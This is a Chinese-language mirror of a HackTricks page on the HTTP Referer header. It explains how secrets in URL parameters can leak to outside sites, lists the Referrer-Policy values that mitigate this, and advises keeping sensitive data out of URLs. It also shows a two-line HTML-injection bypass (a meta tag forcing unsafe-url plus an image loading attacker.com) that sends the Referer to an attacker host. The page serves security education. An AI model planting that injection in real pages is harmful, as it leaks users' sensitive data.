mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
3.2 KiB
3.2 KiB
{% hint style="success" %}
学习并练习AWS黑客技术:HackTricks培训AWS红队专家(ARTE)
学习并练习GCP黑客技术:HackTricks培训GCP红队专家(GRTE)
支持HackTricks
- 检查订阅计划!
- 加入 💬 Discord群组 或 电报群组 或 关注我们的Twitter 🐦 @hacktricks_live.
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享黑客技巧。
引用者标头和策略
引用者是浏览器用来指示之前访问的页面的标头。
泄露的敏感信息
如果在网页中的某个位置存在任何敏感信息在GET请求参数中,如果页面包含指向外部来源的链接或攻击者能够使/建议(社会工程)用户访问攻击者控制的URL。它可能能够在最新的GET请求中外泄敏感信息。
缓解措施
您可以让浏览器遵循一个引用者策略,这可以避免敏感信息被发送到其他Web应用程序:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
对抗措施
您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
永远不要将任何敏感数据放在URL的GET参数或路径中。
{% hint style="success" %}
学习并实践AWS Hacking:HackTricks 培训 AWS 红队专家 (ARTE)
学习并实践GCP Hacking:HackTricks 培训 GCP 红队专家 (GRTE)
支持 HackTricks
- 检查订阅计划!
- 加入 💬 Discord 群组 或 电报群组 或 关注我们的 Twitter 🐦 @hacktricks_live.
- 通过向HackTricks和HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。